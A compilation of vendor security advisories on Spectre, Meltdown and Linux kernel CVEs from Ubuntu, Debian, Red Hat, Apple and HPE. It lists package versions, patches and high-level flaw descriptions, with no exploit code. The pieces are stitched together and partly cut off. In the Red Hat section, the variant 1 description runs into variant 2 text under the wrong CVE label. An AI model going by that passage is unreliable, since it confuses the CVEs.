Ubuntu 14.04 LTS: linux-image-4.4.0-1011-aws 4.4.0-1011.11 linux-image-4.4.0-111-generic 4.4.0-111.134~14.04.1 linux-image-4.4.0-111-lowlatency 4.4.0-111.134~14.04.1 linux-image-4.4.0-111-powerpc-e500mc 4.4.0-111.134~14.04.1 linux-image-4.4.0-111-powerpc-smp 4.4.0-111.134~14.04.1 linux-image-4.4.0-111-powerpc64-emb 4.4.0-111.134~14.04.1 linux-image-4.4.0-111-powerpc64-smp 4.4.0-111.134~14.04.1 linux-image-aws 4.4.0.1011.11 linux-image-generic-lts-xenial 4.4.0.111.95 linux-image-lowlatency-lts-xenial 4.4.0.111.95 linux-image-powerpc-e500mc-lts-xenial 4.4.0.111.95 linux-image-powerpc-smp-lts-xenial 4.4.0.111.95 linux-image-powerpc64-emb-lts-xenial 4.4.0.111.95 linux-image-powerpc64-smp-lts-xenial 4.4.0.111.95
Please note that fully mitigating CVE-2017-5715 (Spectre Variant 2) requires corresponding processor microcode/firmware updates or, in virtual environments, hypervisor updates. Ubuntu is working with Intel and AMD to provide future microcode updates that implement IBRS and IBPB as they are made available. Ubuntu users with a processor from a different vendor should contact the vendor to identify necessary firmware updates. Ubuntu will provide corresponding QEMU updates in the future for users of self-hosted virtual environments in coordination with upstream QEMU. Ubuntu users in cloud environments should contact the cloud provider to confirm that the hypervisor has been updated to expose the new CPU features to virtual machines. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
Debian Security Advisory DSA-4187-1 security@debian.org https://www.debian.org/security/ Ben Hutchings May 01, 2018 https://www.debian.org/security/faq
Package : linux CVE ID : CVE-2015-9016 CVE-2017-0861 CVE-2017-5715 CVE-2017-5753 CVE-2017-13166 CVE-2017-13220 CVE-2017-16526 CVE-2017-16911 CVE-2017-16912 CVE-2017-16913 CVE-2017-16914 CVE-2017-18017 CVE-2017-18203 CVE-2017-18216 CVE-2017-18232 CVE-2017-18241 CVE-2018-1066 CVE-2018-1068 CVE-2018-1092 CVE-2018-5332 CVE-2018-5333 CVE-2018-5750 CVE-2018-5803 CVE-2018-6927 CVE-2018-7492 CVE-2018-7566 CVE-2018-7740 CVE-2018-7757 CVE-2018-7995 CVE-2018-8781 CVE-2018-8822 CVE-2018-1000004 CVE-2018-1000199
Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.
CVE-2015-9016
Ming Lei reported a race condition in the multiqueue block layer
(blk-mq). On a system with a driver using blk-mq (mtip32xx,
null_blk, or virtio_blk), a local user might be able to use this
for denial of service or possibly for privilege escalation.
CVE-2017-0861
Robb Glasser reported a potential use-after-free in the ALSA (sound)
PCM core. We believe this was not possible in practice.
CVE-2017-5715
Multiple researchers have discovered a vulnerability in various
processors supporting speculative execution, enabling an attacker
controlling an unprivileged process to read memory from arbitrary
addresses, including from the kernel and all other processes
running on the system.
This specific attack has been named Spectre variant 2 (branch
target injection) and is mitigated for the x86 architecture (amd64
and i386) by using the "retpoline" compiler feature which allows
indirect branches to be isolated from speculative execution.
CVE-2017-5753
Multiple researchers have discovered a vulnerability in various
processors supporting speculative execution, enabling an attacker
controlling an unprivileged process to read memory from arbitrary
addresses, including from the kernel and all other processes
running on the system.
This specific attack has been named Spectre variant 1
(bounds-check bypass) and is mitigated by identifying vulnerable
code sections (array bounds checking followed by array access) and
replacing the array access with the speculation-safe
array_index_nospec() function.
More use sites will be added over time.
CVE-2017-13166
A bug in the 32-bit compatibility layer of the v4l2 ioctl handling
code has been found. Memory protections ensuring user-provided
buffers always point to userland memory were disabled, allowing
destination addresses to be in kernel space. On a 64-bit kernel a
local user with access to a suitable video device can exploit this
to overwrite kernel memory, leading to privilege escalation.
CVE-2017-13220
Al Viro reported that the Bluetooth HIDP implementation could
dereference a pointer before performing the necessary type check.
A local user could use this to cause a denial of service.
CVE-2017-16526
Andrey Konovalov reported that the UWB subsystem may dereference
an invalid pointer in an error case. A local user might be able
to use this for denial of service.
CVE-2017-16911
Secunia Research reported that the USB/IP vhci_hcd driver exposed
kernel heap addresses to local users.
CVE-2017-16912
Secunia Research reported that the USB/IP stub driver failed to
perform a range check on a received packet header field, leading
to an out-of-bounds read. A remote user able to connect to the
USB/IP server could use this for denial of service.
CVE-2017-16913
Secunia Research reported that the USB/IP stub driver failed to
perform a range check on a received packet header field, leading
to excessive memory allocation. A remote user able to connect to
the USB/IP server could use this for denial of service.
CVE-2017-16914
Secunia Research reported that the USB/IP stub driver failed to
check for an invalid combination of fields in a received packet,
leading to a null pointer dereference. A remote user able to
connect to the USB/IP server could use this for denial of service.
CVE-2017-18017
Denys Fedoryshchenko reported that the netfilter xt_TCPMSS module
failed to validate TCP header lengths, potentially leading to a
use-after-free. If this module is loaded, it could be used by a
remote attacker for denial of service or possibly for code
execution.
CVE-2017-18203
Hou Tao reported that there was a race condition in creation and
deletion of device-mapper (DM) devices. A local user could
potentially use this for denial of service.
CVE-2017-18216
Alex Chen reported that the OCFS2 filesystem failed to hold a
necessary lock during nodemanager sysfs file operations,
potentially leading to a null pointer dereference. A local user
could use this for denial of service.
CVE-2017-18232
Jason Yan reported a race condition in the SAS (Serial-Attached
SCSI) subsystem, between probing and destroying a port. This
could lead to a deadlock. A physically present attacker could
use this to cause a denial of service.
CVE-2017-18241
Yunlei He reported that the f2fs implementation does not properly
initialise its state if the "noflush_merge" mount option is used.
A local user with access to a filesystem mounted with this option
could use this to cause a denial of service.
CVE-2018-1066
Dan Aloni reported to Red Hat that the CIFS client implementation
would dereference a null pointer if the server sent an invalid
response during NTLMSSP setup negotiation. This could be used
by a malicious server for denial of service.
CVE-2018-1068
The syzkaller tool found that the 32-bit compatibility layer of
ebtables did not sufficiently validate offset values. On a 64-bit
kernel, a local user with the CAP_NET_ADMIN capability (in any user
namespace) could use this to overwrite kernel memory, possibly
leading to privilege escalation. Debian disables unprivileged user
namespaces by default.
CVE-2018-1092
Wen Xu reported that a crafted ext4 filesystem image would
trigger a null dereference when mounted. A local user able
to mount arbitrary filesystems could use this for denial of
service.
CVE-2018-5332
Mohamed Ghannam reported that the RDS protocol did not
sufficiently validate RDMA requests, leading to an out-of-bounds
write. A local attacker on a system with the rds module loaded
could use this for denial of service or possibly for privilege
escalation.
CVE-2018-5333
Mohamed Ghannam reported that the RDS protocol did not properly
handle an error case, leading to a null pointer dereference. A
local attacker on a system with the rds module loaded could
possibly use this for denial of service.
CVE-2018-5750
Wang Qize reported that the ACPI sbshc driver logged a kernel heap
address.
CVE-2018-5803
Alexey Kodanev reported that the SCTP protocol did not range-check
the length of chunks to be created. A local or remote user could
use this to cause a denial of service.
CVE-2018-6927
Li Jinyue reported that the FUTEX_REQUEUE operation on futexes did
not check for negative parameter values, which might lead to a
denial of service or other security impact.
CVE-2018-7492
The syzkaller tool found that the RDS protocol was lacking a null
pointer check. A local attacker on a system with the rds module
loaded could use this for denial of service.
CVE-2018-7566
Fan LongFei reported a race condition in the ALSA (sound)
sequencer core, between write and ioctl operations. This could
lead to an out-of-bounds access or use-after-free. A local user
with access to a sequencer device could use this for denial of
service or possibly for privilege escalation.
CVE-2018-7740
Nic Losby reported that the hugetlbfs filesystem's mmap operation
did not properly range-check the file offset. A local user with
access to files on a hugetlbfs filesystem could use this to cause
a denial of service.
CVE-2018-7757
Jason Yan reported a memory leak in the SAS (Serial-Attached
SCSI) subsystem. A local user on a system with SAS devices
could use this to cause a denial of service.
CVE-2018-7995
Seunghun Han reported a race condition in the x86 MCE
(Machine Check Exception) driver. This is unlikely to have
any security impact.
CVE-2018-8781
Eyal Itkin reported that the udl (DisplayLink) driver's mmap
operation did not properly range-check the file offset. A local
user with access to a udl framebuffer device could exploit this to
overwrite kernel memory, leading to privilege escalation.
CVE-2018-8822
Dr Silvio Cesare of InfoSect reported that the ncpfs client
implementation did not validate reply lengths from the server. An
ncpfs server could use this to cause a denial of service or
remote code execution in the client.
CVE-2018-1000004
Luo Quan reported a race condition in the ALSA (sound) sequencer
core, between multiple ioctl operations. This could lead to a
deadlock or use-after-free. A local user with access to a
sequencer device could use this for denial of service or possibly
for privilege escalation.
CVE-2018-1000199
Andy Lutomirski discovered that the ptrace subsystem did not
sufficiently validate hardware breakpoint settings. Local users
can use this to cause a denial of service, or possibly for
privilege escalation, on x86 (amd64 and i386) and possibly other
architectures.
For the oldstable distribution (jessie), these problems have been fixed in version 3.16.56-1.
We recommend that you upgrade your linux packages.
For the detailed security status of linux please refer to its security tracker page at: https://security-tracker.debian.org/tracker/linux
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----
iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlron61fFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0Rtqw//Xf/L4bP65wU9M59Ef6xBt+Eph+yxeMsioGhu80ODdMemlmHzASMtfZjY AXxyt9l8lbHn8MmwDA4aLhhwHYXwvKATdpHSy1SILrRfb4s9P9uV1vsHaIeZ649E hDyNon9hP2tPso6BwqiYHZZy9Xxtd+T8vTBeBZwUKOLBkBRvV/gyNSUdJWp6L8WH aF4D1hHl9ZotDkyIvkubbx77aqbJ88I4R0n69x7L9udFbuXa+U7hV6dJdnpzyl/7 OukJfEtnkaUgWu0MdOfFss6iH5OQISn/y/ricRi29oKQiEp3YwnT5J9pFwSQeJJS H8ABVt251UoS0J+of3QWw0muOT/6UAF8SNpPKMJXC7Euq8pTmYVPSIeUYf4eqn65 UHZSCKXaszItq+uzVNYdkj504BJ4cG1lFxZtlrFWwKE8p7QOETN0GKvTRdu/SvDd Hl2nb4HouLpBYS518Th2/MGgzhXXAuO12MH3smenptZbqxKn9Z0XSTJYzFupgJk/ kKF2xkDFBE4toTLVE+6XdUKwYk4vkeDZyOGOwRYThSkKAzrUh5zThgal4HnknD2A 5ye4XLhjgSIT47/nmor6lhxd7WGXGkV33GF0azYlHr/sclfzxcU2Ev3NUBWQ8M3s CxfIO0FNCzO0WIUf40md7MlIAnDBIRGyYgNIIe7AnSRKKPykEx8= =wNQS -----END PGP SIGNATURE----- . Summary:
An update for kernel is now available for Red Hat Enterprise Linux 6.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
Security Fix(es):
An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions (a commonly used performance optimization). There are three primary variants of the issue which differ in the way the speculative execution can be exploited.
Note: This issue is present in hardware and cannot be fully fixed via software update. The updated kernel packages provide software mitigation for this hardware issue at a cost of potential performance penalty. Please refer to References section for further information about this issue and the performance impact.
In this update mitigations for x86-64 architecture are provided.
Variant CVE-2017-5753 triggers the speculative execution by performing a bounds-check bypass. It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory accesses may cause allocation into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to cross the syscall boundary and read privileged memory by conducting targeted cache side-channel attacks. It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory accesses may cause allocation into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to cross the syscall and guest/host boundaries and read privileged memory by conducting targeted cache side-channel attacks. (CVE-2017-5715, Important)
Variant CVE-2017-5754 relies on the fact that, on impacted microprocessors, during speculative execution of instruction permission faults, exception generation triggered by a faulting access is suppressed until the retirement of the whole instruction block. In a combination with the fact that memory accesses may populate the cache even when the block is being dropped and never committed (executed), an unprivileged local attacker could use this flaw to read privileged (kernel space) memory by conducting targeted cache side-channel attacks. (CVE-2017-5754, Important)
Note: CVE-2017-5754 affects Intel x86-64 microprocessors. AMD x86-64 microprocessors are not affected by this issue.
Red Hat would like to thank Google Project Zero for reporting these issues.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The system must be rebooted for this update to take effect.
- Bugs fixed (https://bugzilla.redhat.com/):
1519778 - CVE-2017-5753 hw: cpu: speculative execution bounds-check bypass 1519780 - CVE-2017-5715 hw: cpu: speculative execution branch target injection 1519781 - CVE-2017-5754 hw: cpu: speculative execution permission faults handling
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: kernel-2.6.32-696.18.7.el6.src.rpm
i386: kernel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-devel-2.6.32-696.18.7.el6.i686.rpm kernel-headers-2.6.32-696.18.7.el6.i686.rpm perf-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm
noarch: kernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm kernel-doc-2.6.32-696.18.7.el6.noarch.rpm kernel-firmware-2.6.32-696.18.7.el6.noarch.rpm
x86_64: kernel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm kernel-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-headers-2.6.32-696.18.7.el6.x86_64.rpm perf-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm
x86_64: kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: kernel-2.6.32-696.18.7.el6.src.rpm
noarch: kernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm kernel-doc-2.6.32-696.18.7.el6.noarch.rpm kernel-firmware-2.6.32-696.18.7.el6.noarch.rpm
x86_64: kernel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm kernel-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-headers-2.6.32-696.18.7.el6.x86_64.rpm perf-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: kernel-2.6.32-696.18.7.el6.src.rpm
i386: kernel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-devel-2.6.32-696.18.7.el6.i686.rpm kernel-headers-2.6.32-696.18.7.el6.i686.rpm perf-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm
noarch: kernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm kernel-doc-2.6.32-696.18.7.el6.noarch.rpm kernel-firmware-2.6.32-696.18.7.el6.noarch.rpm
ppc64: kernel-2.6.32-696.18.7.el6.ppc64.rpm kernel-bootwrapper-2.6.32-696.18.7.el6.ppc64.rpm kernel-debug-2.6.32-696.18.7.el6.ppc64.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm kernel-debug-devel-2.6.32-696.18.7.el6.ppc64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-696.18.7.el6.ppc64.rpm kernel-devel-2.6.32-696.18.7.el6.ppc64.rpm kernel-headers-2.6.32-696.18.7.el6.ppc64.rpm perf-2.6.32-696.18.7.el6.ppc64.rpm perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm
s390x: kernel-2.6.32-696.18.7.el6.s390x.rpm kernel-debug-2.6.32-696.18.7.el6.s390x.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.s390x.rpm kernel-debug-devel-2.6.32-696.18.7.el6.s390x.rpm kernel-debuginfo-2.6.32-696.18.7.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-696.18.7.el6.s390x.rpm kernel-devel-2.6.32-696.18.7.el6.s390x.rpm kernel-headers-2.6.32-696.18.7.el6.s390x.rpm kernel-kdump-2.6.32-696.18.7.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-696.18.7.el6.s390x.rpm kernel-kdump-devel-2.6.32-696.18.7.el6.s390x.rpm perf-2.6.32-696.18.7.el6.s390x.rpm perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm
x86_64: kernel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm kernel-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-headers-2.6.32-696.18.7.el6.x86_64.rpm perf-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm
ppc64: kernel-debug-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-696.18.7.el6.ppc64.rpm perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm python-perf-2.6.32-696.18.7.el6.ppc64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm
s390x: kernel-debug-debuginfo-2.6.32-696.18.7.el6.s390x.rpm kernel-debuginfo-2.6.32-696.18.7.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-696.18.7.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-696.18.7.el6.s390x.rpm perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm python-perf-2.6.32-696.18.7.el6.s390x.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm
x86_64: kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: kernel-2.6.32-696.18.7.el6.src.rpm
i386: kernel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-devel-2.6.32-696.18.7.el6.i686.rpm kernel-headers-2.6.32-696.18.7.el6.i686.rpm perf-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm
noarch: kernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm kernel-doc-2.6.32-696.18.7.el6.noarch.rpm kernel-firmware-2.6.32-696.18.7.el6.noarch.rpm
x86_64: kernel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm kernel-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-headers-2.6.32-696.18.7.el6.x86_64.rpm perf-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm
x86_64: kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/security/vulnerabilities/speculativeexecution https://access.redhat.com/security/cve/CVE-2017-5753 https://access.redhat.com/security/cve/CVE-2017-5715 https://access.redhat.com/security/cve/CVE-2017-5754
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2018 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFaTXwuXlSAg2UNWIIRAp3LAKCNdSqjVu7zsXcUTnpGuuQAuUlTpwCfTE/O OR+iGnoY+cALbsBWKwbmzQM= =V4ow -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2018-1-8-1 iOS 11.2.2
iOS 11.2.2 is now available and and addresses the following:
Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Description: iOS 11.2.2 includes security improvements to Safari and WebKit to mitigate the effects of Spectre (CVE-2017-5753 and CVE-2017-5715). Make sure you have an Internet connection and have installed the latest version of iTunes from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
- Navigate to Settings
- Select General
- Select About.
ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. Description:
The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03805en_us
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: hpesbhf03805en_us Version: 7
HPESBHF03805 rev.7 - Certain HPE products using Microprocessors from Intel, AMD, and ARM, with Speculative Execution, Elevation of Privilege and Information Disclosure.
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2018-01-23 Last Updated: 2018-01-22
Potential Security Impact: Local: Disclosure of Information, Elevation of Privilege
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY On January 3 2018, side-channel security vulnerabilities involving speculative execution were publicly disclosed. These vulnerabilities may impact the listed HPE products, potentially leading to information disclosure and elevation of privilege. Mitigation and resolution of these vulnerabilities may call for both an operating system update, provided by the OS vendor, and a system ROM update from HPE.
Note:
- This issue takes advantage of techniques commonly used in many modern processor architectures.
-
For further information, microprocessor vendors have provided security advisories:
References:
- CVE-2017-5715 - aka Spectre, branch target injection
- CVE-2017-5753 - aka Spectre, bounds check bypass
- CVE-2017-5754 - aka Meltdown, rogue data cache load, memory access permission check performed after kernel memory read
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
- HPE ProLiant DL380 Gen10 Server - To be delivered
- HPE ProLiant DL180 Gen10 Server - To be delivered
